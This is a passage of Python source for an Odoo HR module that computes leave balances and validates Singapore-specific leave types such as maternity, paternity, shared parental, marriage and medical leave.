in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# \n# temp = emp.dependent_ids and emp.dependent_ids[0].birth_date\n# if temp:\n# temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n# for dependent in emp.dependent_ids:\n# birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if birth > temp:\n# temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n# if temp:\n# to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n# temp7 = temp + relativedelta(years=7)\n# temp12 = temp + relativedelta(years=12)\n# \n# if to_date <= temp7 or to_date >= temp12:\n# reason = ('Child should between 7 to 12 year old, of %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Child should between 7 to 12 year old, of %s Employee') % (emp.name))\n# if int(self.no_of_days + leave_days) != 2:\n# reason = ('You can allocate 2 days for CCL Leave for %s Employee') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n You can allocate 2 days for CCL Leave for %s Employee') % (emp.name))\n# else:\n# reason = ('Employee %s does not have configure Child.') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s does not have configure Child.') % (emp.name))\n# \n# else:\n# reason = ('Employee %s is not applicable for Extender Childcare Leave') % (emp.name)\n# reason_vals.append({'employee_id': emp.id, 'reason': reason, 'allocate_leave_id': res_id.id})\n# emp_ids.append(emp.id)\n# # raise ValidationError(_('Warning \\n Employee %s is not applicable for Extender Childcare Leave') % (emp.name))\n# \n# # res = super(allocate_leave, self).allocate_leaves()\n# for emp in self.employee_ids:\n# if emp.gender == 'male' and self.holiday_status_id.name in ['ML16','ML15','ML8','ML4']:\n# continue\n# if emp.gender == 'female' and self.holiday_status_id.name in ['PL']:\n# continue\n# if emp.id in emp_ids:\n# continue\n# leave_rec = []\n# if emp.leave_config_id and emp.leave_config_id.holiday_group_config_line_ids:\n# for leave in emp.leave_config_id.holiday_group_config_line_ids:\n# leave_rec.append(leave.leave_type_id.id)\n# if self.holiday_status_id.id in leave_rec:\n# if self.holiday_status_id.name == 'AL' and self.fiscal_year_id.code == str(datetime.datetime.today().year):\n# current_year = datetime.datetime.today().year\n# fiscal_year_id = self.env['hr.year'].search([('code', '=', str(current_year - 1))])\n# holiday_ids = self.env['hr.holidays'].search([('employee_id', '=', emp.id), \n# ('type', '=', 'add'),\n# ('holiday_status_id', '=', self.holiday_status_id.id),\n# ('hr_year_id', '=', fiscal_year_id.id),\n# ])\n# leave_days = 0\n# for holiday in holiday_ids:\n# leave_days += holiday.number_of_days_temp\n# if self.no_of_days == 21:\n# #if self.no_of_days > 28:\n# #need to implement the payroll condition where 50% salary of up to 21 or 7 days will be credited\n# if self.no_of_days == 28:\n# continue\n# if self.no_of_days < 28:\n# self.no_of_days = self.no_of_days + (28 - leave_days)\n# if self.no_of_days == 14:\n# #if self.no_of_days > 28:\n# #need to implement the 
payroll condition where 50% salary of up to 21 or 7 days will be credited\n# if self.no_of_days == 14:\n# continue\n# if self.no_of_days < 14:\n# self.no_of_days = self.no_of_days + (14 - leave_days)\n# vals = {\n# 'name' : 'Assign Default ' + str(self.holiday_status_id.name2),\n# 'holiday_status_id': self.holiday_status_id.id, \n# 'type': self.type,\n# 'employee_id': emp.id,\n# 'number_of_days_temp': self.no_of_days,\n# 'state': 'validate',\n# 'holiday_type' : 'employee',\n# 'hr_year_id':self.fiscal_year_id.id\n# # 'start_date':self.start_date,\n# # 'end_date':self.end_date,\n# }\n# self.env['hr.holidays'].create(vals)\n# \n# for data in reason_vals:\n# self.env['allocate.leaves.reason'].create(data)\n# # return res\n# if not reason_vals:\n# return True\n# else:\n# view_id = self.env.ref('sg_leave_types.view_allocate_leaves_info_form').id\n# return {\n# 'name': _('Allocate Leaves'),\n# 'type': 'ir.actions.act_window',\n# 'res_model': 'allocate.leaves',\n# 'view_mode': 'form',\n# 'view_type': 'form',\n# 'view_id': view_id,\n# 'target': 'new',\n# 'res_id': res_id.id,\n# }\n\nclass hr_holidays_status(models.Model):\n _inherit = \"hr.holidays.status\"\n\n @api.multi\n def get_days(self, employee_id):\n # need to use `dict` constructor to create a dict per id\n today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)\n hr_year_id = self.env['hr.holidays'].fetch_hryear(today)\n result = dict((id, dict(max_leaves=0, leaves_taken=0, remaining_leaves=0,\n virtual_remaining_leaves=0)) for id in self.ids)\n holidays = self.env['hr.holidays'].search([('employee_id', '=', employee_id),\n ('state', 'not in', ['draft', 'refuse', 'cancel']),\n ('holiday_status_id', 'in', self.ids),\n ('leave_expire', '!=', True),\n ('hr_year_id','=',hr_year_id),\n ])\n for holiday in holidays:\n status_dict = result[holiday.holiday_status_id.id]\n if holiday.type == 'add':\n if holiday.state == 'validate':\n status_dict['virtual_remaining_leaves'] += holiday.number_of_days_temp\n status_dict['remaining_leaves'] += holiday.number_of_days_temp\n if not holiday.is_recovery:\n status_dict['max_leaves'] += holiday.number_of_days_temp\n elif holiday.type == 'remove': # number of days is negative\n status_dict['virtual_remaining_leaves'] -= holiday.number_of_days_temp\n if holiday.state == 'validate':\n status_dict['leaves_taken'] += holiday.number_of_days_temp\n status_dict['remaining_leaves'] -= holiday.number_of_days_temp\n return result\n\nclass HrHolidays(models.Model):\n _inherit = 'hr.holidays'\n\n @api.depends('holiday_status_id')\n def _get_child_age(self):\n for obj in self:\n if obj.holiday_status_id and obj.holiday_status_id.name in ['CCL', 'ECCL']:\n temp = obj.employee_id.dependent_ids and obj.employee_id.dependent_ids[0].birth_date\n if temp:\n temp = datetime.datetime.strptime(temp, DEFAULT_SERVER_DATE_FORMAT).date()\n for dependent in obj.employee_id.dependent_ids:\n if dependent.relation_ship in ['son', 'daughter']:\n birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n if birth > temp:\n temp = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n\n# birth_date = datetime.datetime.strptime(obj.child_birthdate, DEFAULT_SERVER_DATE_FORMAT).date()\n if temp:\n to_date = datetime.datetime.strptime(fields.Date.today() + \" 00:00:00\", DEFAULT_SERVER_DATETIME_FORMAT).date()\n years = relativedelta(to_date, temp).years\n months = relativedelta(to_date, temp).months\n obj.child_age = years + (months / 12.0)\n\n @api.depends('holiday_status_id')\n def 
_check_is_admin(self):\n        for obj in self:\n            if obj._uid == 1:\n                obj.is_admin = True\n\n    @api.depends('holiday_status_id')\n    def _check_is_non_sp_child(self):\n        for obj in self:\n            for depend_id in obj.employee_id.dependent_ids:\n                if depend_id.relation_ship in ['son', 'daughter']:\n                    if depend_id.singaporean:\n                        obj.is_non_sp_child = False\n                    else:\n                        obj.is_non_sp_child = True\n\n    def _sg_date(self):\n        date = datetime.datetime.now()\n        return date\n\n    applicant_date = fields.Datetime(string='Date of Application', default=_sg_date)\n    attachment = fields.Binary(string=\"Add Supporting Documents\")\n    attachment_name = fields.Char(string=\"Add Supporting Documents\")\n    child_age = fields.Float(string=\"Childs Age\", compute=\"_get_child_age\")\n\n    attachment_gppl = fields.Binary(string=\"GPPL\")\n    attachment_gppl_name = fields.Char(string=\"GPPL\")\n    gppl_link = fields.Char(string=\"GPPL Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/GPPL1%20(updated%2029062016).pdf\")\n\n    attachment_splas = fields.Binary(string=\"SPLAS\")\n    attachment_splas_name = fields.Char(string=\"SPLAS\")\n    attachment_spl = fields.Binary(string=\"SPL\")\n    attachment_spl_name = fields.Char(string=\"SPL\")\n    spl_link = fields.Char(string=\"SPL Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/SPL1.pdf\")\n\n    attachment_gmpl = fields.Binary(string=\"GPML1\")\n    attachment_gmpl_name = fields.Char(string=\"GPML1\")\n    gmpl_link = fields.Char(string=\"GPML1 Link\", default=\"https://www.profamilyleave.gov.sg/Documents/PDF/GPML1.pdf\")\n\n    medical_certificate = fields.Binary(string=\"Medical Certificate\")\n    medical_certificate_name = fields.Char(string=\"Medical Certificate\")\n\n    hospital_certificate = fields.Binary(string=\"Hospital Certificate\")\n    hospital_certificate_name = fields.Char(string=\"Hospital Certificate\")\n\n    death_certificate = fields.Binary(string=\"Death Certificate\")\n    death_certificate_name = fields.Char(string=\"Death Certificate\")\n\n    relevent_certificate = fields.Binary(string=\"Relevent Certificate\")\n    relevent_certificate_name = fields.Char(string=\"Relevent Certificate\")\n\n    singaporean = fields.Boolean(string=\"Child Citizenship\")\n    text = fields.Char(default=\"Attach agreement form from your wife (print out from SPLAS)\")\n\n    is_admin = fields.Boolean(compute=\"_check_is_admin\")\n    is_non_sp_child = fields.Boolean(compute=\"_check_is_non_sp_child\")\n\n    @api.constrains('holiday_status_id', 'employee_id','date_from','date_to')\n    def _check_employee_leave(self):\n        if self._context is None:\n            self._context = {}\n        for rec in self:\n            if rec.type == 'remove' and rec.holiday_status_id.pre_approved ==True:\n                from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n                qualify_date = from_date - relativedelta(days=rec.holiday_status_id.no_of_days)\n                if qualify_date < datetime.datetime.today().date():\n                    raise ValidationError(_('%s must be applied at least %d days in advance.' 
% (rec.holiday_status_id.name2, rec.holiday_status_id.no_of_days)))\n return True\n\n @api.multi\n def action_approve(self):\n for holiday in self:\n holiday.write({'state': 'validate'})\n holiday.action_validate()\n# if self.env.user.partner_id.id == self.next_manager_id.id or self.next_manager_id.id == False:\n# if not self.env.user.has_group('hr_holidays.group_hr_holidays_user'):\n# raise UserError(_('Only an HR Officer or Manager can approve leave requests.'))\n# # if not self.env.user.has_group('hr_holidays.group_hr_holidays_user'):\n# # raise UserError(_('Only an HR Officer or Manager can approve leave requests.'))\n# \n# for holiday in self:\n# if (holiday.next_manager_user_id) and (self.env.user.id == holiday.next_manager_user_id.id):\n# holiday.write({'next_manager_id': self.env.user.employee_ids[0].parent_id.id,\n# 'total_approval': holiday.total_approval + 1})\n# # else:\n# # raise UserError(_('Need to approve by '+ str(self.next_manager_user_id.name)))\n# \n# if (holiday.no_of_approval == holiday.total_approval) or (holiday.next_manager_id.id == False):\n# holiday.write({'state': 'validate'})\n# holiday.action_validate()\n# else:\n# raise UserError(_('Only %s can approve leave requests.') % self.next_manager_id.name)\n\n @api.multi\n def get_approval_email(self):\n email = ''\n if self.employee_id.work_email:\n email = self.employee_id.work_email\n elif self.employee_id.user_id.partner_id.email:\n email = self.employee_id.user_id.partner_id.email\n else:\n raise Warning(_(' Warning \\n Email must be configured in %s Employee !') % (self.employee_id.name))\n# for employee_email in work_email:\n# email += employee_email + ','\n return email\n\n @api.onchange('half_day', 'date_from', 'date_to', 'holiday_status_id', 'employee_id')\n def onchange_date_from(self,date_from=False, date_to=False,half_day=False, holiday_status_id=False, employee_id=False):\n if date_from == False:\n if self.date_from and not self.half_day:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n date_from = self.date_from\n if date_to == False:\n if self.date_to:\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n date_to = self.date_to\n if holiday_status_id == False:\n holiday_status_id = self.holiday_status_id.id\n if employee_id == False:\n employee_id = self.employee_id.id\n if half_day == False:\n half_day == False\n else:\n half_day = self.half_day\n leave_day_count = False\n if holiday_status_id and holiday_status_id != False:\n leave_day_count = self.env['hr.holidays.status'].browse(holiday_status_id).count_days_by\n if (date_from and date_to) and (date_from > date_to) and half_day == False:\n result = {'value': {}}\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n result['value']['date_to'] = str(date_to_with_delta)\n return result\n# raise UserError(_('Warning!\\nThe start date must be anterior to the end date.'))\n elif (date_from and date_to) and half_day == True:\n date_to = date_from\n result = {'value': {}}\n if date_from and not date_to:\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=8)\n result['value']['date_to'] = str(date_to_with_delta)\n if (date_to and date_from) and (date_from <= date_to):\n if leave_day_count != False and leave_day_count == 'working_days_only':\n diff_day = 
self._check_holiday_to_from_dates(date_from, date_to, employee_id)\n result['value']['number_of_days_temp'] = round(math.floor(diff_day))\n else:\n diff_day = self._get_number_of_days(date_from, date_to,employee_id)\n result['value']['number_of_days_temp'] = round(math.floor(diff_day))+ 1\n else:\n result['value']['number_of_days_temp'] = 0.0\n if date_from and date_to and half_day == True:\n date_to_with_delta = datetime.datetime.strptime(date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n result['value']['date_to'] = str(date_to_with_delta)\n if self.half_day == True:\n result['value']['number_of_days_temp'] = 0.5\n\n return result\n\n @api.onchange('half_day', 'date_from', 'date_to', 'holiday_status_id', 'employee_id')\n def onchange_date_to(self,date_from=False, date_to=False,half_day=False, holiday_status_id=False, employee_id=False):\n res = super(HrHolidays, self).onchange_date_to(date_from=date_from, date_to=date_to,half_day=half_day, holiday_status_id=holiday_status_id, employee_id=employee_id)\n if self.half_day:\n if res.get('value') and res.get('value').get('number_of_days_temp'):\n res['value']['number_of_days_temp'] = res.get('value').get('number_of_days_temp') - 0.50\n if (res.get('value').get('number_of_days_temp') - 0.50) > 0.5:\n self.am_or_pm = 'AM'\n return res\n\n @api.onchange('half_day', 'date_from', 'holiday_status_id','employee_id')\n def onchange_half_day(self):\n if self.half_day == True:\n if self.date_from != False:\n date_to_with_delta = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT) + datetime.timedelta(hours=4)\n self.date_to = str(date_to_with_delta)\n self.number_of_days_temp = 0.50\n else:\n self.date_to = self.date_from\n self.number_of_days_temp = 0.50\n else:\n result = self.onchange_date_to(date_from=self.date_from, date_to=self.date_to,half_day=False,holiday_status_id=self.holiday_status_id.id,employee_id=self.employee_id.id)\n if self.date_from:\n df = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT) + relativedelta(hours=9)\n self.date_to = df\n self.number_of_days_temp = result['value']['number_of_days_temp']\n self.am_or_pm = False\n\n @api.onchange('am_or_pm')\n def onchange_am_or_pm(self):\n if self.half_day and self.date_from and self.date_to:\n if self.am_or_pm == 'AM':\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n if self.am_or_pm == 'PM':\n if self.number_of_days_temp > 0.5:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=1)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n self.am_or_pm = 'AM'\n else:\n frm_date = datetime.datetime.strptime(self.date_from, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_from = frm_date + relativedelta(hour=6)\n\n to_date = datetime.datetime.strptime(self.date_to, DEFAULT_SERVER_DATETIME_FORMAT)\n self.date_to = to_date\n\n @api.model\n def create(self, vals):\n res = super(HrHolidays, self).create(vals)\n\n if self._context.get('off_in_lieu', False):\n if res.employee_id.leave_manager:\n\n temp_id = self.env['ir.model.data'].get_object_reference('sg_leave_types', 'email_temp_leave_approval')[1]\n# ctx = self.env.context.copy() if self.env.context else {}\n# menu_id = 
self.env['ir.model.data'].get_object_reference('hr_holidays', 'menu_open_allocation_holidays')[1]\n# action_id = self.env['ir.model.data'].get_object_reference('sg_leave_types', 'open_allocation_holidays_extend')[1]\n# base_url = self.env['ir.config_parameter'].sudo().get_param('web.base.url')\n# ctx['approval_link'] = base_url + \"/web?#id=\"+ str(res.id) +\"&view_type=form&model=hr.holidays&menu_id=\" + str(menu_id) + \"&action=\" + str(action_id)\n# ctx.pop('default_state')\n# self.sudo().with_context(ctx).send_email(res.id, temp_id, force_send=True)\n\n return res\n\n @api.multi\n def copy(self, default=None):\n# self.ensure_one()\n# \n# date_from = datetime.datetime.strptime(str(datetime.datetime.today().date()), '%Y-%m-%d')\n# date_to = datetime.datetime.strptime(str(datetime.datetime.today().date()), '%Y-%m-%d') + datetime.timedelta(hours=8)\n# \n# default.update({'date_from': str(date_from), 'date_to': str(date_to)})\n raise UserError(_('Sorry, you cannot duplicate a Leave!'))\n\n return super(HrHolidays, self).copy(default)\n\n @api.constrains('holiday_status_id', 'employee_id')\n def _check_sg_maternity_leave_16_weeks(self):\n '''\n The method used to Validate for Maternity Leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name in ['ML16','ML15','ML8','ML4']:\n if rec.employee_id.gender == 'male':\n raise ValidationError(_('Employee should be Female! \\n This Leave is only applicable for Female employees!'))\n if rec.holiday_status_id.pre_approved == True:\n if rec.employee_id and rec.employee_id.id and rec.employee_id.join_date:\n if rec.employee_id.singaporean == True and rec.employee_id.depends_singaporean == True:\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n qualify_date = joining_date + relativedelta(months=3)\n if datetime.datetime.today().date() < qualify_date:\n raise ValidationError(_('Not qualified by joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n two_month_date = from_date - relativedelta(months=2)\n if two_month_date < datetime.datetime.today().date():\n raise ValidationError(_('Warning! \\n Maternity Leave request should be submitted 2 months prior to the requested date!'))\n else:\n raise ValidationError(_('Warning!
\\n Child is not a Singapore citizen!'))\n else:\n raise ValidationError(_('You are not able to apply for this Maternity leave!'))\n\n\n @api.constrains('holiday_status_id', 'employee_id', 'date_from', 'date_to', 'child_birthdate')\n def _check_paternity_leave(self):\n '''\n The method used to Validate for Paternity Leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n today_date = datetime.datetime.today().date()\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'PL':\n if rec.holiday_status_id.pre_approved == True:\n date_from = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n date_to = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n if (date_to - date_from).days != 14:\n raise ValidationError(_('Warning! \\n Entitlement of 2 weeks in a continuous block!'))\n if rec.employee_id.gender == 'female':\n raise ValidationError(_('Employee should be Male! \\n This Leave is only applicable for Male employees!'))\n if not rec.employee_id.dependent_ids:\n raise ValidationError(_('No Child Dependents found! \\n Please add child details in the Dependents list of this employee\\'s profile!'))\n depends_ids = self.env['dependents'].search([('employee_id','=',rec.employee_id.id),('birth_date','=',rec.child_birthdate),('relation_ship','in',['son','daughter'])])\n if len(depends_ids.ids) == 0:\n raise ValidationError(_('No Child found! \\n No Child found for the Birth date %s!'%(rec.child_birthdate)))\n if rec.employee_id and rec.employee_id.id and rec.employee_id.singaporean == True and rec.employee_id.depends_singaporean == True and rec.employee_id.join_date:\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n qualify_date = joining_date + relativedelta(months=3)\n if today_date >= qualify_date:\n child_birth_date = datetime.datetime.strptime(rec.child_birthdate, DEFAULT_SERVER_DATE_FORMAT).date()\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n qualify_date = child_birth_date + relativedelta(years=1)\n # child_bd_week = child_birth_date.isocalendar()\n sixteen_weeks_later = child_birth_date + relativedelta(weeks=16)\n before_qualify_date = from_date - relativedelta(weeks=2)\n# if to_date > qualify_date:\n# raise ValidationError(_('Not Qualified in Joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n if to_date > sixteen_weeks_later:\n raise ValidationError(_('Warning! \\n Paternity leave should be taken within 16 weeks of the child\\'s birth date!'))\n if before_qualify_date < today_date:\n raise ValidationError(_('Warning! \\n Paternity Leave request should be submitted 2 weeks prior to the requested date!'))\n else:\n raise ValidationError(_('Not qualified by joining date! \\n Employee must have worked in the company for a continuous duration of at least 3 months!'))\n else:\n raise ValidationError(_('Warning!
\\n Child is not a Singapore citizen!'))\n\n if rec.type == 'remove' and rec.holiday_status_id.name == 'SPL':\n if rec.holiday_status_id.pre_approved:\n if not rec.employee_id.dependent_ids:\n raise ValidationError(_('No Child Dependents found! \\n Please add child details in the Dependents list of this employee\\'s profile!'))\n depends_ids = self.env['dependents'].search([('employee_id', '=', rec.employee_id.id), ('relation_ship', 'in', ['son', 'daughter'])])\n if rec.employee_id.marital != 'married':\n raise ValidationError(_('Warning! \\n Employee should be Married!'))\n\n joining_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT).date()\n today_date = datetime.datetime.today().date()\n if (today_date - joining_date).days < 90:\n raise ValidationError(_('Employee %s should have 3+ months of experience in the same company.' % (rec.employee_id.name)))\n\n if len(depends_ids.ids) == 0:\n raise ValidationError(_('No Child found! \\n No Child found for the Birth date %s!' % (rec.child_birthdate)))\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n date_to = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n if (date_to - from_date).days != 6:\n raise ValidationError(_('Warning! \\n Entitlement of 1 week in a continuous block!'))\n\n if rec.employee_id and rec.employee_id.id and rec.employee_id.singaporean and rec.employee_id.join_date:\n flag = False\n for dependent in rec.employee_id.dependent_ids:\n if dependent.relation_ship in ['son', 'daughter']:\n birth = datetime.datetime.strptime(dependent.birth_date, DEFAULT_SERVER_DATE_FORMAT).date()\n if (birth + relativedelta(years=1)) >= from_date and birth <= from_date:\n flag = True\n\n# to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).date()\n before_qualify_date = from_date - relativedelta(weeks=2)\n if not flag:\n raise ValidationError(_('Warning! \\n Shared Parental leave should be taken within 1 year of the child\\'s birth date!'))\n if before_qualify_date < today_date:\n raise ValidationError(_('Warning! \\n Shared Parental Leave request should be submitted 2 weeks prior to the requested date!'))\n else:\n raise ValidationError(_('Warning!
\\n Child is not a Singapore citizen!'))\n\n @api.constrains('holiday_status_id', 'date_from', 'date_to', 'employee_id')\n def _check_marriage_leave(self):\n '''\n The method used to Validate marriage leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name in ('MLC','ML'):\n if rec.employee_id.gender == 'female' and rec.employee_id.marital != 'married':\n raise ValidationError(_('Employee should be Married!'))\n\n if rec.holiday_status_id.pre_approved == True:\n from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).date()\n qualify_date = from_date - relativedelta(weeks=2)\n if qualify_date < datetime.datetime.today().date():\n raise ValidationError(_('Marriage Leave request should be submitted 2 weeks prior to the requested date!'))\n\n @api.constrains('holiday_status_id', 'employee_id', 'date_from', 'date_to')\n def _check_sg_medical_opt_leave(self):\n '''\n The method used to Validate medical leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n @param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n today = time.strftime(DEFAULT_SERVER_DATE_FORMAT)\n date_today = datetime.datetime.today()\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'MOL':\n if rec.holiday_status_id.pre_approved == True:\n if rec.employee_id.join_date and rec.employee_id.join_date <= today:\n join_date = datetime.datetime.strptime(rec.employee_id.join_date, DEFAULT_SERVER_DATE_FORMAT)\n one_year_day = join_date + relativedelta(months=12)\n three_months = join_date + relativedelta(months=3)\n if three_months < date_today and one_year_day > date_today:\n med_rmv = 0.0\n self._cr.execute(\"SELECT sum(number_of_days_temp) FROM hr_holidays where employee_id=%d and holiday_status_id = %d and type='remove'\" % (rec.employee_id.id, rec.holiday_status_id.id))\n all_datas = self._cr.fetchone()\n if all_datas and all_datas[0]:\n med_rmv += all_datas[0]\n res_date = relativedelta(date_today, join_date)\n tot_month = res_date.months\n if tot_month == 3 and med_rmv > 5:\n raise ValidationError(_('You cannot apply for more than 5 days of medical leave in 3 months!'))\n elif tot_month == 4 and med_rmv > 8:\n raise ValidationError(_('You cannot apply for more than 8 days of medical leave in 4 months!'))\n elif tot_month == 5 and med_rmv > 11:\n raise ValidationError(_('You cannot apply for more than 11 days of medical leave in 5 months!'))\n elif tot_month >= 6 and med_rmv > 14:\n raise ValidationError(_('You cannot apply for more than 14 days of medical leave in one year!'))\n if three_months > date_today:\n raise ValidationError(_('You are not able to apply for a Medical leave request!'))\n\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Medical Certificate only')\n }}\n\n @api.constrains('holiday_status_id', 'date_from', 'date_to')\n def _check_off_in_leave(self):\n '''\n The method used to Validate off in lieu leave.\n @param self : Object Pointer\n @param cr : Database Cursor\n @param uid : Current User Id\n
@param ids : Current object Id\n @param context : Standard Dictionary\n @return : True or False\n ------------------------------------------------------\n '''\n if self._context is None:\n self._context = {}\n curr_month = datetime.datetime.today().month\n for rec in self:\n if rec.type == 'remove' and rec.holiday_status_id.name == 'OIL':\n if rec.holiday_status_id.pre_approved:\n if rec.is_urgent:\n raise ValidationError(_('You can not apply Urgent off in leave!'))\n# from_date = datetime.datetime.strptime(rec.date_from, DEFAULT_SERVER_DATETIME_FORMAT).month\n# to_date = datetime.datetime.strptime(rec.date_to, DEFAULT_SERVER_DATETIME_FORMAT).month\n# if int(from_date) != int(curr_month) or int(to_date) != int(curr_month):\n# raise ValidationError(_('You can apply off in leave Request for current month only!'))\n\n @api.onchange('holiday_status_id','employee_id')\n def on_change_leavetype(self):\n res = super(HrHolidays, self).on_change_leavetype()\n if self.employee_id:\n self.next_manager_id = self.employee_id.leave_manager.id\n if self.holiday_status_id and self.holiday_status_id.name == 'MOL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Medical Certificate only')\n }}\n if self.holiday_status_id and self.holiday_status_id.name == 'HOL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Please be reminded to attach original Hospitalization Certificate only')\n }}\n\n if self.holiday_status_id and self.holiday_status_id.name == 'OIL':\n return {'warning': {\n 'title': _('Warning'),\n 'message': _('Off In-Lieu cannot be used for overseas trip')\n }}\n\n if self._context.get('off_in_lieu', False):\n leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n if leave_status:\n return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n else:\n return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n return res\n\n# @api.onchange('employee_id')\n# def onchange_employee(self):\n# res = super(HrHolidays, self).onchange_employee()\n# for record in self:\n# record.next_manager_id = record.employee_id and record.employee_id.parent_id.id or False\n# record.holiday_status_id = record.holiday_status_id and record.holiday_status_id.id or False\n# \n# if self._context.get('off_in_lieu', False):\n# leave_status = self.env['hr.holidays.status'].search([('name', '=', 'OIL')], limit=1)\n# if leave_status:\n# return {'domain': {'holiday_status_id': [('id', 'in', [leave_status.id])]}}\n# else:\n# return {'domain': {'holiday_status_id': [('id', 'in', [])]}}\n# return res\n\n @api.onchange('employee_id')\n def onchange_employee(self):\n\n result = {}\n leave_type_ids = self.env['hr.holidays.status'].search([])\n self.leave_config_id = False\n self.holiday_status_id = False\n result.update({'domain':{'holiday_status_id':[('id','not in',leave_type_ids.ids)]}})\n if self.employee_id and self.employee_id.id:\n self.department_id = self.employee_id.department_id\n if self.employee_id.sudo().gender:\n self.gender = self.employee_id.sudo().gender\n if self.employee_id.leave_config_id and self.employee_id.leave_config_id.id:\n self.leave_config_id = self.employee_id.leave_config_id.id\n if self.employee_id.leave_config_id.holiday_group_config_line_ids and self.employee_id.leave_config_id.holiday_group_config_line_ids.ids:\n leave_type_list = []\n for leave_type in self.employee_id.leave_config_id.holiday_group_config_line_ids:\n leave_type_list.append(leave_type.leave_type_id.id)\n 
